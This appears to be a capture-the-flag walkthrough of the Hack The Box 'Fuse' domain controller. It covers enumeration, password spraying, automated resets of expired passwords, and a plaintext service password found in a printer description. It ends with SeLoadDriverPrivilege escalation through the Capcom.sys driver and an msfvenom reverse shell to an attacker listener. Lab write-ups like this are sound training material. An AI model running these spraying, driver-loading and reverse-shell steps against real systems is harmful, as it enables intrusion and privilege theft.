Fuse HTB

IP

10.10.10.193

initial nmap scan

 sudo nmap -p- --min-rate 10000 10.10.10.193 | cut -d"/" -f1 | tr '\n' ','

results

53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708

Lets run a more in-depth scan of the target

sudo nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49677,49678,49679,49702,49708 -oA tcp_ports 10.10.10.193

results

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 23:36:40Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  โ–’๏ฟฝh๏ฟฝ๏ฟฝU       Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc        Microsoft Windows RPC
49679/tcp open  msrpc        Microsoft Windows RPC
49702/tcp open  msrpc        Microsoft Windows RPC
49708/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h52m08s, deviation: 4h37m09s, median: 12m07s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-01-07T23:37:32
|_  start_date: 2024-01-07T23:30:39
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-07T15:37:31-08:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.46 seconds

what we can see

  • Most likely a domain controller given the presence of DNS, Kerberos, ldap etc

  • Windows server 2016

  • domain name: fabricorp.local we can add this to our hosts file

  • Hosts name: FUSE

Lets see if we can perform a zone transfer since Port 53 (DNS) is present

dig @10.10.10.193 fabricorp.local AXFR
  • No luck

Lets test for anonymous authentication among the services

SMB

crackmapexec smb 10.10.10.193 -u anonymous -p ''
  • No luck

LDAP

ldapsearch -x -H ldap://10.10.10.193 -s sub -b "DC=fabricorp,DC-local" "(ObjectClass=person)"
  • No luck

RPC

rpcclient -N -U anonymous 10.10.10.193
  • No luck

Lets try the web Server

when we try to navigate to http://fabrcorp.local we are redirected to `http://fuse.fabricorp.local/papercut/logs/html/index.htm Lets add the subdomain fuse to our subdomain

when we do and try and access the page again we can see the following

Looking att the print logs we can see a couple of username's on the system

pmerton
tlavel
sthompson
bhult
administrator

other then usernames i cant really find any other peices of interesting information, and we need a set of working creds to progress so we can utilise cewl to build a wordlist we could use with the usernames we have found

building a wordlist

cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers --depth 4 > pass_lists.txt

Now we have a list of possible usernames Lets perform some password spraying via smb

crackmapexec smb 10.10.10.193 -u usernames.txt -p pass_lists.txt

we do see something interesting

we have

tlavel:Fabricorp01
bhult:Fabricorp01
  • But looks like the passwords have expired

tried to authenticate to a few services, but no luck

if we look back at the image above we can see the message STATUS_PASSWORD_MUST_CHANGE , meaning we do have valid credentials but they are expired, we could try and reset the password using a tool like smbpasswd

impacket-smbpasswd fabricorp/tlavel:Fabricorp01@10.10.10.193 -newpass shrek123!
  • Now we just need to create a password that matches the Password complexity

shrek123!
  • It seems the password expires after 1 minute from creation, wat we can do is write a basic python script that will automate the password change process

import subprocess
import random
import string

def gen_password(length=9):
    chars = string.ascii_letters + string.digits + string.punctuation
    password = ''.join(random.choice(chars) for i in range(length))
    return password

def escape_password(password):
    # Escape special characters in the password
    return password.replace('"', r'\"').replace("'", r"\'")

def Grabitall():
    new_password = gen_password()
    escaped_pass = escape_password(new_password)
    change_pass = [
        '/usr/bin/impacket-smbpasswd',
        'fabricorp/tlavel:Fabricorp01@10.10.10.193',
        '-newpass',
        escaped_pass
    ]
    try:
        #running the command
        result = subprocess.run(change_pass, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        #checking if trhe command was successful (exit code is zero)
        if result.returncode == 0:
            print(f"{new_password}")
        else:
            print("Password change failed")
            print(f'Command output {result.stderr}')
    except subprocess.CalledProcessError as e:
        print(f'the following error has occured {e}')
        print(f"Command output {result.stderr}")

Grabitall()

Now that we have our automation script, we can continue enumerating

Lets list all the shares

  1. Lets create a new password

./smbpasswd.py
  1. Now lets use crackmapexec to list all the shares

crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' --shares
  1. for good measures we will also use the spider_plus module and see if we can find anything interesting

crackmapexec smb 10.10.10.193 -u tlavel -p 'Eo,mer/1F' -M spider_plus

Nothing to interesting within smb so lets head over to rpc

rpcclient -U fabricorp/tlavel 10.10.10.193

when we enumerate domain users we can see the following

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

Since within http it showed printing information a good place to start enumerating would be the printers

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

Looks like we could have a possible password

scan2docs: $fab@s3Rv1ce$1
  • Looks like creds for the HP-MFT01 smb share

crackmapexec smb 10.10.10.193 -u scan2docs -p '$fab@s3Rv1ce$1'
  • Doesnt authenticate

Lets perform some password spraying using the recently found usernames

  1. first lets clean them up

sed -n 's/user:\[\(.*\)\] rid:.*/\1/p' usernames > cleaned_usernames.txt
  1. Lets use crackmapexec to perform the password spraying

crackmapexec smb 10.10.10.193 -u cleaned_usernames.txt -p '$fab@s3Rv1ce$1'

and we can see we have some valid creds

svc-print: $fab@s3Rv1ce$1 

Lets list the shares we have access to

crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' --shares

Lets use the spider_plus module and see if we have access to anything interesting

crackmapexec smb 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1' -M spider_plus
  • nothing interesting

Lets see if we can winrm into the machine

evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
  • we have a shell on the system

Now we have a session on the target, Lets see if we can enumerate ldap with bloodhound-python and get some info on the system

bloodhound-python -c all -d fabricorp.local -u svc-print -p '$fab@s3Rv1ce$1' -ns 10.10.10.193
  1. Lets start neo4j

sudo neo4j console
  • login

  1. start bloodhound

bloodhound --no-sandbox

Now we can digest all the information we found using bloodhound-python

  • Dont really find much interesting

If we look within our current privileges on the machine we can see something interesting

  • we can see we have the SeLoadDrivePrivilege enabled for our current user

  • essentially allows us to place something in the kernel

How can we exploit this?

  • essentially since we have the SeLoadDriverPrivilege we are able to load a vulnerable driver, then exploit said driver this post explains this better

we can use the following vulnerable driver

Lets walk thorugh the steps needed to compile, load, and exploit the SeLoadDriverPrivilege

  1. We will need to compile a few .exe files for the following attack, the best way to compile .exe files would be in a Windows VM. To load the vulnerable driver capcom.sys we will use the following tool from Tarlogic security https://github.com/TarlogicSecurity/EoPLoadDriver/

git clone https://github.com/TarlogicSecurity/EoPLoadDriver.git

After we have downloaded the tool (essentially a single c++ file) Let's start a new project in VS , at the window, we will choose the C++ Console App

  • Note: when creating a new project and specifying the project template "Console App" you may run into an error when creating the project, to fix this go to the visual studio installer

click 'Modify' and download the 'Desktop development with C++'

After this is installed we should be able to specify the Console App template without error

  1. alright back to compiling the eopladdriver.cpp

  • lets start a new project

click 'Next'

  • In the next window we can specify the name of our new project

  • here we can specify the name of the project (you can name it whatever you want)

  • Looking in the project we can see a basic hello world project

  • Now we can replace the code within EoPloadDriver.cpp code below

after we have copy and paste the code, we can set the project to 'Release' and 'x64'

then we select 'Build' -> 'Build Solution'

  • Note: we receive and error with the line include "stdafx.h" we can just remove it and it will build

now we should be able to see the .exe file within the specified file path

Now we can transfer this over to our linux machine

for this i will start a python HTTP server on my windows machine

python.exe -m http.server 80

from our linux machine

wget http://<windows_ip>/EoPLoadDriver.exe

Now we can upload it to the target machine

upload EoPLoadDriver.exe

We also need to upload the Capcom.sys

upload Capcom.sys

Now that we have the vulnerable driver and the loader to the target machine, we can run same command we saw in the blog post

.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys

we can see the following

  • it looks like it has worked no error, but we dont have the permissions if the driver is actually running

Next we need to build the actual exploit for our vulnerable driver, we can use the following code

Since this is a .sln file we will need to utilise visual studio on our windows machine, after we have cloned the repo we can simply double click on the ExploitCapcom.sln file

  1. Lets build the project to see if an error occur before we modify the code

  • No errors, ready for us to modify the code slightly, if we look at the LaunchShell function we can see the following

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
  • this just open a cmd prompt, but since we only have remote access to the machine this is pretty pointless, what we will do is generate a reverse-shell with msfvenom and drop that on the system, instead of the function executing cmd.exe we are going to make it execute shrek123.exe our reverse-shell

so we want to change one line in the code

/ Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\ProgramData\\shrek123.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
  • Now we can build the executable file, just like what we did with the loader

  1. Lets download this onto our linux host, same as before with a python http server

  2. Lets generate our reverse-shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.22 LPORT=9001 -f exe -o shrek123.exe
  1. Lets upload and start a listner

upload shrek123.exe
upload ExploitCapcom.exe
  • start a listener

rlwrap -cAr nc -lvnp 9001
  1. Lets execute the exploit

note: may have to run the follwoing again before executing the exploit

.\EoPLoadDriver.exe System\CurrentControlSet\dfserv C:\Users\svc-print\Documents\Capcom.sys

Lets execute the exploit

.\ExploitCapcom.exe
  1. if we check our listener we should have a shell

Last updated